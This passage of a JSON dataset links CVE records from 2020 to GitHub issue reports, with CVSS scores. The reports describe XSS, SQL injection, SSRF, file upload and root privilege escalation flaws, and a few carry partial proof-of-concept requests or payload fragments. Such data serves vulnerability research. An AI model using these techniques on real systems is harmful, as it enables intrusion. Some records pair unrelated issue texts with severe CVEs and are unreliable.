In any case, I would be happy to help and assist with the issue.",
  58561. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  58562. "severity": "MEDIUM",
  58563. "baseScore": 5.5,
  58564. "impactScore": 3.6,
  58565. "exploitabilityScore": 1.8
  58566. },
  58567. {
  58568. "CVE_ID": "CVE-2020-26880",
  58569. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/943",
  58570. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/943",
  58571. "Repo_new": "sympa-community/sympa",
  58572. "Issue_Created_At": "2020-05-24T08:01:47Z",
  58573. "description": "FILETAG will be published. [ ] Prepare pull request will merge it soon. [ ] New version of Sympa and a patch will be released.",
  58574. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58575. "severity": "HIGH",
  58576. "baseScore": 7.8,
  58577. "impactScore": 5.9,
  58578. "exploitabilityScore": 1.8
  58579. },
  58580. {
  58581. "CVE_ID": "CVE-2020-26880",
  58582. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1009",
  58583. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1009",
  58584. "Repo_new": "sympa-community/sympa",
  58585. "Issue_Created_At": "2020-10-07T15:31:58Z",
  58586. "description": "root privilege escalation from user sympa by modifying APITAG Version any Installation method any Expected behavior user 'sympa' only execute specific tasks as root and cannot gain more privileges, following the principles of privileges separation Actual behavior user 'sympa' can obtain full root shell access Additional information Following up on URLTAG > A more concrete vulnerability you document in your patch, is that APITAG (as well as its entire directory) is owned by user 'sympa', so an attacker who compromised [the 'sympa' user] can directly edit the main APITAG and escalate to root. Given that the configuration file is parsed as root through the setuid sympa_newaliases wrapper, and can execute arbitrary commands through its backticks syntax, there is an unintentional privilege escalation from sympa to full root shell access. The information is public in the aforementioned thread hence this bug introduce no confidential information and is reported publicly as well. APITAG also allows for CVE assignment for small projects without a CNA able to run a full embargo procedure.) Mitigations include replacing sympa_newaliases wrapper by an alternate alias manager, see e.g. URLTAG . Credits goes to MENTIONTAG .",
  58587. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58588. "severity": "HIGH",
  58589. "baseScore": 7.8,
  58590. "impactScore": 5.9,
  58591. "exploitabilityScore": 1.8
  58592. },
  58593. {
  58594. "CVE_ID": "CVE-2020-26947",
  58595. "Issue_Url_old": "https://github.com/monero-project/monero-gui/issues/3142",
  58596. "Issue_Url_new": "https://github.com/monero-project/monero-gui/issues/3142",
  58597. "Repo_new": "monero-project/monero-gui",
  58598. "Issue_Created_At": "2020-10-08T19:18:38Z",
  58599. "description": "fatal error: APITAG No such file or directory. My build failed with an error related to APITAG ERRORTAG In the code base I found a reference to APITAG URLTAG but that file doesn't exist.",
  58600. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58601. "severity": "HIGH",
  58602. "baseScore": 7.8,
  58603. "impactScore": 5.9,
  58604. "exploitabilityScore": 1.8
  58605. },
  58606. {
  58607. "CVE_ID": "CVE-2020-27155",
  58608. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6637",
  58609. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6637",
  58610. "Repo_new": "octopusdeploy/issues",
  58611. "Issue_Created_At": "2020-10-20T23:16:44Z",
  58612. "description": "APITAG polling endpoint can allow untrusted connections. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description If configured, the APITAG polling endpoint URLTAG can allow untrusted connections to be made under certain conditions. This endpoint is _not_ enabled by default. This issue does not affect Octopus Servers running on Linux, as the APITAG polling endpoint is not available. Affected versions Octopus Server NUMBERTAG to NUMBERTAG Mitigation Upgrade to the latest available supported version of Octopus Server. Workarounds Disable APITAG endpoint Use the following commands to disable the APITAG endpoint. CODETAG Links CVE: CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58614. "severity": "HIGH",
  58615. "baseScore": 7.5,
  58616. "impactScore": 3.6,
  58617. "exploitabilityScore": 3.9
  58618. },
  58619. {
  58620. "CVE_ID": "CVE-2020-27155",
  58621. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6639",
  58622. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6639",
  58623. "Repo_new": "octopusdeploy/issues",
  58624. "Issue_Created_At": "2020-10-20T23:49:24Z",
  58625. "description": "APITAG polling endpoint can allow untrusted connections. Tips for success NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58626. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58627. "severity": "HIGH",
  58628. "baseScore": 7.5,
  58629. "impactScore": 3.6,
  58630. "exploitabilityScore": 3.9
  58631. },
  58632. {
  58633. "CVE_ID": "CVE-2020-27155",
  58634. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6640",
  58635. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6640",
  58636. "Repo_new": "octopusdeploy/issues",
  58637. "Issue_Created_At": "2020-10-20T23:51:07Z",
  58638. "description": "APITAG polling endpoint can allow untrusted connections NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
  58639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  58640. "severity": "HIGH",
  58641. "baseScore": 7.5,
  58642. "impactScore": 3.6,
  58643. "exploitabilityScore": 3.9
  58644. },
  58645. {
  58646. "CVE_ID": "CVE-2020-27173",
  58647. "Issue_Url_old": "https://github.com/rust-vmm/vm-superio/issues/17",
  58648. "Issue_Url_new": "https://github.com/rust-vmm/vm-superio/issues/17",
  58649. "Repo_new": "rust-vmm/vm-superio",
  58650. "Issue_Created_At": "2020-10-14T07:54:28Z",
  58651. "description": "Implementation of the serial console may allocate an unbounded amount of memory. We have identified a possible APITAG issue in rust vmm/vm superio NUMBERTAG Issue Description The rust vmm/vm superio implementation of the serial console which emulates a UART port type NUMBERTAG A allows buffering an unlimited number of bytes from input sources when using the FIFO functionality. This issue can not be triggered from the guest side. This issue presents no impact to AWS Services. Impact All VMMs that are using the FIFO functionality to forward host side input from an untrusted source to the guest can be subject to a APITAG issue. This issue cannot be triggered from serial output generated by the guest. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. Rate limiting the input from the host side also mitigates the issue. Affected Systems rust vmm/vm superio NUMBERTAG Proposed Mitigation Impact can be mitigated by upgrading to vm superio NUMBERTAG configuring memory limits to the process that is using vm superio, or by rate limiting the writes to the process standard input.",
  58652. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58653. "severity": "HIGH",
  58654. "baseScore": 7.5,
  58655. "impactScore": 3.6,
  58656. "exploitabilityScore": 3.9
  58657. },
  58658. {
  58659. "CVE_ID": "CVE-2020-27174",
  58660. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2177",
  58661. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2177",
  58662. "Repo_new": "firecracker-microvm/firecracker",
  58663. "Issue_Created_At": "2020-10-14T09:38:36Z",
  58664. "description": "Firecracker serial console emulation may allocate an unbounded amount of memory. We have identified an issue in the Firecracker serial console emulation of all Firecracker versions up to NUMBERTAG and Firecracker NUMBERTAG Issue Description The Firecracker implementation of the serial console emulation allows buffering of an unlimited number of bytes when data is written to the Firecracker process standard input at a high rate. Impact Firecracker customers that forward the standard input of the Firecracker process to untrusted users can become subject to APITAG attacks. If memory limits are not imposed on the Firecracker process, this might impair other APITAG on the same host from allocating memory, potentially becoming an availability issue. Serial output generated by the guest can\u2019t trigger the issue. Affected Systems Firecracker versions NUMBERTAG and NUMBERTAG while all older releases might be impacted. Mitigation Impact can be mitigated by applying memory limits to the Firecracker process or by applying a rate limit when writing to the Firecracker process standard input.",
  58665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58666. "severity": "HIGH",
  58667. "baseScore": 7.5,
  58668. "impactScore": 3.6,
  58669. "exploitabilityScore": 3.9
  58670. },
  58671. {
  58672. "CVE_ID": "CVE-2020-27176",
  58673. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2360",
  58674. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2360",
  58675. "Repo_new": "marktext/marktext",
  58676. "Issue_Created_At": "2020-10-15T02:44:28Z",
  58677. "description": "Mutation XSS to RCE in APITAG Description There's a Cross Site Scripting (mutation XSS) that leads to Remote Code Execution (RCE) in APITAG NUMBERTAG Tested under Linux, have little doubt that the same issue is present in releases for all other platforms. Steps to reproduce NUMBERTAG Either create an .md file from scratch or in the \"source code mode\" add the following (without the backticks): ERRORTAG NUMBERTAG Either open the newly created file in APITAG or get back into the regular, main view mode NUMBERTAG Observe a popup with text APITAG Research\". Expected behavior: The APITAG is rendered as data, not executable code. Actual behavior: The APITAG is executed as code. Versions Mark Text version NUMBERTAG Operating system: presumably all, APITAG crafted for Linux. Notes This mutation XSS is possible due to the outdated APITAG library version. The XSS leads to RCE, as typical to Electron environments. To pop the calc in e.g. Gnome use the following payload: ERRORTAG The base NUMBERTAG encoded chunk is APITAG specific, but trivially adaptable to Windows or APITAG APITAG FILETAG Remediation The issue is caused (a) because of the outdated APITAG dependency, (b) more broadly, because HTML parsing is allowed. APITAG is a great piece of work, however various bypasses are naturally found every now and then. This means that APITAG always needs to stay on the bleeding edge to avoid similar issues. It may prove more scalable if the approach to avoiding Cross Site Scripting was more complex and in depth. As a short term fix, bumping up APITAG should help. CVSS NUMBERTAG I propose this CVSS vector FILETAG Thanks, Mark Art at Havoc Research.",
  58678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58679. "severity": "CRITICAL",
  58680. "baseScore": 9.6,
  58681. "impactScore": 6.0,
  58682. "exploitabilityScore": 2.8
  58683. },
  58684. {
  58685. "CVE_ID": "CVE-2020-27195",
  58686. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9129",
  58687. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9129",
  58688. "Repo_new": "hashicorp/nomad",
  58689. "Issue_Created_At": "2020-10-20T17:41:09Z",
  58690. "description": "(placeholder).",
  58691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  58692. "severity": "CRITICAL",
  58693. "baseScore": 9.1,
  58694. "impactScore": 5.2,
  58695. "exploitabilityScore": 3.9
  58696. },
  58697. {
  58698. "CVE_ID": "CVE-2020-27197",
  58699. "Issue_Url_old": "https://github.com/TAXIIProject/libtaxii/issues/246",
  58700. "Issue_Url_new": "https://github.com/taxiiproject/libtaxii/issues/246",
  58701. "Repo_new": "taxiiproject/libtaxii",
  58702. "Issue_Created_At": "2020-10-14T11:12:52Z",
  58703. "description": "Blind SSRF vulnerability. When the content that starts with APITAG is passed to libtaxii's parse method, the library executes HTTP GET request, even though APITAG is set to True on the XML parser Executing ERRORTAG will trigger a GET request to ERRORTAG from URLTAG",
  58704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58705. "severity": "CRITICAL",
  58706. "baseScore": 9.8,
  58707. "impactScore": 5.9,
  58708. "exploitabilityScore": 3.9
  58709. },
  58710. {
  58711. "CVE_ID": "CVE-2020-27197",
  58712. "Issue_Url_old": "https://github.com/eclecticiq/OpenTAXII/issues/176",
  58713. "Issue_Url_new": "https://github.com/eclecticiq/opentaxii/issues/176",
  58714. "Repo_new": "eclecticiq/opentaxii",
  58715. "Issue_Created_At": "2020-10-14T10:30:34Z",
  58716. "description": "Blind SSRF in APITAG Hi, I and my colleague APITAG Kota) were testing the opentaxii locally deployed instance and found that it is vulnerable to SSRF issue which can be exploited by adding URLTAG xml data> Sample POC: POST /services/discovery HTTP NUMBERTAG Host: APITAG Connection: close Accept Encoding: gzip, deflate Accept: application/xml User Agent: Cabby NUMBERTAG TAXII Accept: APITAG X TAXII Services: APITAG X TAXII Content Type: APITAG X TAXII Protocol: APITAG Content Type: application/xml Content Length NUMBERTAG FILETAG APITAG FILETAG",
  58717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58718. "severity": "CRITICAL",
  58719. "baseScore": 9.8,
  58720. "impactScore": 5.9,
  58721. "exploitabilityScore": 3.9
  58722. },
  58723. {
  58724. "CVE_ID": "CVE-2020-27216",
  58725. "Issue_Url_old": "https://github.com/eclipse/jetty.project/issues/5451",
  58726. "Issue_Url_new": "https://github.com/eclipse/jetty.project/issues/5451",
  58727. "Repo_new": "eclipse/jetty.project",
  58728. "Issue_Created_At": "2020-10-15T19:44:57Z",
  58729. "description": "Improve Workiing Directory creation. Jetty version NUMBERTAG Java version All OS type/version All Description When the APITAG deploys an application, the temp directory creation is using an old Java Classlib API for creating unique directories. Lets modernize this, as newer Java Classlib APIs exist to make this a single step.",
  58730. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58731. "severity": "HIGH",
  58732. "baseScore": 7.0,
  58733. "impactScore": 5.9,
  58734. "exploitabilityScore": 1.0
  58735. },
  58736. {
  58737. "CVE_ID": "CVE-2020-27219",
  58738. "Issue_Url_old": "https://github.com/eclipse/hawkbit/issues/1067",
  58739. "Issue_Url_new": "https://github.com/eclipse/hawkbit/issues/1067",
  58740. "Repo_new": "eclipse/hawkbit",
  58741. "Issue_Created_At": "2021-01-11T07:26:25Z",
  58742. "description": "Cross site scripting vulnurability. Hi, our security team reported an issue with our Hawkbit instance: Request: POST to /cgi bin/ APITAG xss test APITAG .asp Response: {\"timestamp NUMBERTAG APITAG ERRORTAG APITAG APITAG PATHTAG APITAG .asp\"} I was able to reproduce this behavior on your sandbox instance. Btw. for GET requests the path is not returned. Could you please provide a fix or a workaround for that behavior? Kind regards, Holger",
  58743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58744. "severity": "MEDIUM",
  58745. "baseScore": 6.1,
  58746. "impactScore": 2.7,
  58747. "exploitabilityScore": 2.8
  58748. },
  58749. {
  58750. "CVE_ID": "CVE-2020-27224",
  58751. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7954",
  58752. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7954",
  58753. "Repo_new": "eclipse-theia/theia",
  58754. "Issue_Created_At": "2020-06-03T20:15:17Z",
  58755. "description": "security] XSS vulnerability in markdown preview. Bug Description: XSS vulnerability in markdown preview The Markdown Preview can exploited to execute arbitrary code. Steps to Reproduce NUMBERTAG Create markdown file and append the following text: APITAG NUMBERTAG Save and close the file NUMBERTAG Right click the file and select Open With > Preview NUMBERTAG Observe the alert has fired. The root cause of the vulnerability is the current usage of [markdown it URLTAG to render html URLTAG then subsequently adding the output to the DOM via APITAG URLTAG without sanitizing. Moreover, there are several potential xss sinks within the Theia code base that could potentially be exploited in a similar fashion (e.g. APITAG URLTAG , APITAG URLTAG would the community be open to accepting contributions to mitigate these vulnerabilities, and accompanying lint rules that would bar future usages of xss sinks? Additional Information Operating System: Linux Theia Version NUMBERTAG",
  58756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58757. "severity": "CRITICAL",
  58758. "baseScore": 9.6,
  58759. "impactScore": 6.0,
  58760. "exploitabilityScore": 2.8
  58761. },
  58762. {
  58763. "CVE_ID": "CVE-2020-27403",
  58764. "Issue_Url_old": "https://github.com/sickcodes/security/issues/1",
  58765. "Issue_Url_new": "https://github.com/sickcodes/security/issues/1",
  58766. "Repo_new": "sickcodes/security",
  58767. "Issue_Created_At": "2020-11-28T23:06:34Z",
  58768. "description": "Some models have different open port for webserver with root fs NUMBERTAG Tested on U NUMBERTAG P NUMBERTAG with Android8. Installed f droid.on the TV and APITAG (nmap) and scanned all ports on localhost APITAG Serveral open ports and port NUMBERTAG contained the save http server with the entire fs available for free. Any app could this way access anything,bypassing all security. Not binded to wifi ip address,however,perhaps already fixed remotely by TCL. Localhost binding still present and several other services available via localhost as well.",
  58769. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58770. "severity": "MEDIUM",
  58771. "baseScore": 6.5,
  58772. "impactScore": 3.6,
  58773. "exploitabilityScore": 2.8
  58774. },
  58775. {
  58776. "CVE_ID": "CVE-2020-27533",
  58777. "Issue_Url_old": "https://github.com/dedetech/issues/issues/16",
  58778. "Issue_Url_new": "https://github.com/dedetech/issues/issues/16",
  58779. "Repo_new": "dedetech/issues",
  58780. "Issue_Created_At": "2020-07-26T20:14:58Z",
  58781. "description": "Cross Site Scripting APITAG Affected software : APITAG Version NUMBERTAG Type of vulnerability : XSS APITAG Site Scripting) Author : Noth Description: APITAG CMS is susceptible to cross site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages APITAG NUMBERTAG login admin page URLTAG FILETAG NUMBERTAG Type XSS Payload in the search ==> \"> APITAG alert NUMBERTAG APITAG FILETAG Test Video : URLTAG Reason: Failure to filter or escape special characters leads to vulnerabilities How to fix : escape special characters or filter it .",
  58782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58783. "severity": "MEDIUM",
  58784. "baseScore": 5.4,
  58785. "impactScore": 2.7,
  58786. "exploitabilityScore": 2.3
  58787. },
  58788. {
  58789. "CVE_ID": "CVE-2020-27814",
  58790. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1283",
  58791. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1283",
  58792. "Repo_new": "uclouvain/openjpeg",
  58793. "Issue_Created_At": "2020-11-23T10:08:15Z",
  58794. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG e URLTAG . I build openjpeg with ASAN, this is ASAN report. POC picture : FILETAG ERRORTAG I also try to prove it without ASAN. ERRORTAG",
  58795. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58796. "severity": "HIGH",
  58797. "baseScore": 7.8,
  58798. "impactScore": 5.9,
  58799. "exploitabilityScore": 1.8
  58800. },
  58801. {
  58802. "CVE_ID": "CVE-2020-27828",
  58803. "Issue_Url_old": "https://github.com/jasper-software/jasper/issues/252",
  58804. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/252",
  58805. "Repo_new": "jasper-software/jasper",
  58806. "Issue_Created_At": "2020-11-30T09:22:12Z",
  58807. "description": "Heap buffer overflow in PATHTAG I found a heap buffer overflow in the current master NUMBERTAG URLTAG . I build jasper with ASAN, this is an ASAN report. POC picture : FILETAG ERRORTAG I also try to prove it without ASAN. It malloc NUMBERTAG bytes in APITAG When APITAG It tries to write APITAG and causes heap buffer overflow write.",
  58808. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58809. "severity": "HIGH",
  58810. "baseScore": 7.8,
  58811. "impactScore": 5.9,
  58812. "exploitabilityScore": 1.8
  58813. },
  58814. {
  58815. "CVE_ID": "CVE-2020-27848",
  58816. "Issue_Url_old": "https://github.com/dotCMS/core/issues/19500",
  58817. "Issue_Url_new": "https://github.com/dotcms/core/issues/19500",
  58818. "Repo_new": "dotcms/core",
  58819. "Issue_Created_At": "2020-10-27T01:40:55Z",
  58820. "description": "SQL Injection Vulnerability in api PATHTAG api : PATHTAG Is vulnerable to SQL injection, by the parameter \u2018orderby\u2019 in url. APITAG APITAG As the pictures above shows, APITAG , it took NUMBERTAG seconds to receive the response from server APITAG , it took NUMBERTAG seconds to receive the response from server Then I read through the code that I download from github(version NUMBERTAG I found that the parameter will form SQL without sterilization (yeah, you have designed APITAG to prevent SQL injection, but in this case, the vulnerable API didn't call APITAG I tried to attack the project by sqlmap(a tool to detect and exploit SQL injection), and here is the result that sqlmap gave me: tables that the project contains: APITAG columns that the table called \u2018adminconfig\u2019 contains: APITAG It\u2019s obviously that there is SQL injection in your program.",
  58821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58822. "severity": "HIGH",
  58823. "baseScore": 8.8,
  58824. "impactScore": 5.9,
  58825. "exploitabilityScore": 2.8
  58826. },
  58827. {
  58828. "CVE_ID": "CVE-2020-27853",
  58829. "Issue_Url_old": "https://github.com/wireapp/wire-audio-video-signaling/issues/23",
  58830. "Issue_Url_new": "https://github.com/wireapp/wire-avs/issues/23",
  58831. "Repo_new": "wireapp/wire-avs",
  58832. "Issue_Created_At": "2020-09-02T13:34:30Z",
  58833. "description": "Format String Vulnerability. Format String Vulnerability There is a Format String vulnerability in sdp.cpp line NUMBERTAG URLTAG The function parameter value of function APITAG is controllable by an attacker and can lead to a format string attack. The function APITAG is implemented in media.c of the library re. The vulnerability is fixed in current Android and iOS Wire Applications. The vulnerability was exploitable in the Android and iOS Wire Apps at least until Wire Android Version NUMBERTAG and iOS Version NUMBERTAG An attacker could crash remote Wire Applications by a call with malformed sdp data, if the remote particpant accepts the call. The vulnerability could potentially lead to remote code execution.",
  58834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58835. "severity": "CRITICAL",
  58836. "baseScore": 9.8,
  58837. "impactScore": 5.9,
  58838. "exploitabilityScore": 3.9
  58839. },
  58840. {
  58841. "CVE_ID": "CVE-2020-27886",
  58842. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/76",
  58843. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/76",
  58844. "Repo_new": "eyesofnetworkcommunity/eonweb",
  58845. "Issue_Created_At": "2020-10-23T07:52:25Z",
  58846. "description": "Multiples vuln\u00e9rabilit\u00e9s critiques. Bonjour, J'ai identifi\u00e9 de nouvelles vuln\u00e9rabilit\u00e9s qui, combin\u00e9es ensemble permettent de prendre le contr\u00f4le complet d'un serveur EON \u00e0 distance mis \u00e0 jour depuis les versions r7 et r8 de eonweb actuellement publi\u00e9es dans les paquets officiels. L'impact est similaire aux codes d'exploitation publi\u00e9s ici : URLTAG J'ai pu valider la pr\u00e9sence des vuln\u00e9rabilit\u00e9s ainsi que l'exploitation de celles ci pouvant amener \u00e0 l'ex\u00e9cution de commandes en tant que root sans authentification pr\u00e9alable. Je peux communiquer les d\u00e9tails des vuln\u00e9rabilit\u00e9s identifi\u00e9es ici si vous le souhaitez.",
  58847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58848. "severity": "CRITICAL",
  58849. "baseScore": 9.8,
  58850. "impactScore": 5.9,
  58851. "exploitabilityScore": 3.9
  58852. },
  58853. {
  58854. "CVE_ID": "CVE-2020-28062",
  58855. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/10",
  58856. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/10",
  58857. "Repo_new": "hisiphp/hisiphp",
  58858. "Issue_Created_At": "2020-10-21T10:44:22Z",
  58859. "description": "There is a file upload vulnerability that can execute arbitrary code. In APITAG after the administrator logs in, the installation package FILETAG file) can be uploaded at the system > local plug in > import plug in FILETAG The code for uploading the logic is located in the APITAG function of the PATHTAG class, where the zip file is extracted before being safely processed. Special packets can be constructed in APITAG Throws an exception to bypass the security check Package FILETAG as a zip file (make sure there are APITAG /plugins/ under the path) Poc as follows FILETAG The response contains the path FILETAG You can see that FILETAG is uploaded FILETAG",
  58860. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  58861. "severity": "HIGH",
  58862. "baseScore": 7.2,
  58863. "impactScore": 5.9,
  58864. "exploitabilityScore": 1.2
  58865. },
  58866. {
  58867. "CVE_ID": "CVE-2020-28087",
  58868. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1887",
  58869. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1887",
  58870. "Repo_new": "jeecgboot/jeecg-boot",
  58871. "Issue_Created_At": "2020-10-24T09:33:04Z",
  58872. "description": "sql NUMBERTAG After testing, it is found that the code parameter of /jeecg PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection FILETAG FILETAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
  58873. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58874. "severity": "HIGH",
  58875. "baseScore": 7.5,
  58876. "impactScore": 3.6,
  58877. "exploitabilityScore": 3.9
  58878. },
  58879. {
  58880. "CVE_ID": "CVE-2020-28088",
  58881. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1888",
  58882. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1888",
  58883. "Repo_new": "jeecgboot/jeecg-boot",
  58884. "Issue_Created_At": "2020-10-24T10:12:13Z",
  58885. "description": "There is an arbitrary file upload vulnerability NUMBERTAG After testing, it is found that there is an arbitrary file upload vulnerability in the image upload function of \"custom component\" of jeecg boot, and the interface is PATHTAG \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project is started, click \"custom component\" and grab the package to get the interface with arbitrary file upload vulnerability FILETAG Modify the upload suffix name and upload content through packet capture FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
  58886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58887. "severity": "CRITICAL",
  58888. "baseScore": 9.8,
  58889. "impactScore": 5.9,
  58890. "exploitabilityScore": 3.9
  58891. },
  58892. {
  58893. "CVE_ID": "CVE-2020-28091",
  58894. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
  58895. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
  58896. "Repo_new": "cbkhwx/cxuucmsv3",
  58897. "Issue_Created_At": "2020-10-24T16:32:51Z",
  58898. "description": "SQL injection vulnerability exists in FILETAG url. An SQL injection vulnerability exists in the front end FILETAG page Use sqlmap to inject the demo website\uff1a exp : CODETAG Verify screenshot\uff1a FILETAG",
  58899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58900. "severity": "HIGH",
  58901. "baseScore": 7.5,
  58902. "impactScore": 3.6,
  58903. "exploitabilityScore": 3.9
  58904. },
  58905. {
  58906. "CVE_ID": "CVE-2020-28092",
  58907. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/6",
  58908. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/6",
  58909. "Repo_new": "lazyphp/PESCMS-TEAM",
  58910. "Issue_Created_At": "2020-11-02T13:50:09Z",
  58911. "description": "PECSM TEAM NUMBERTAG has multiple reflected Cross Site Scripting Vulnerability. I found a reflective XSS vulnerability at: URLTAG APITAG now I input payload APITAG APITAG the full url is : URLTAG And many pages use id parameters, and they all reflect cross site scripting vulnerabilities\uff1a URLTAG URLTAG URLTAG URLTAG",
  58912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58913. "severity": "MEDIUM",
  58914. "baseScore": 6.1,
  58915. "impactScore": 2.7,
  58916. "exploitabilityScore": 2.8
  58917. },
  58918. {
  58919. "CVE_ID": "CVE-2020-28102",
  58920. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/9",
  58921. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/9",
  58922. "Repo_new": "chshcms/cscms",
  58923. "Issue_Created_At": "2020-10-26T07:13:46Z",
  58924. "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1ajs_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } }else{ $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } $this APITAG >get_del('ads',$id); $info FILETAG right answer: FILETAG",
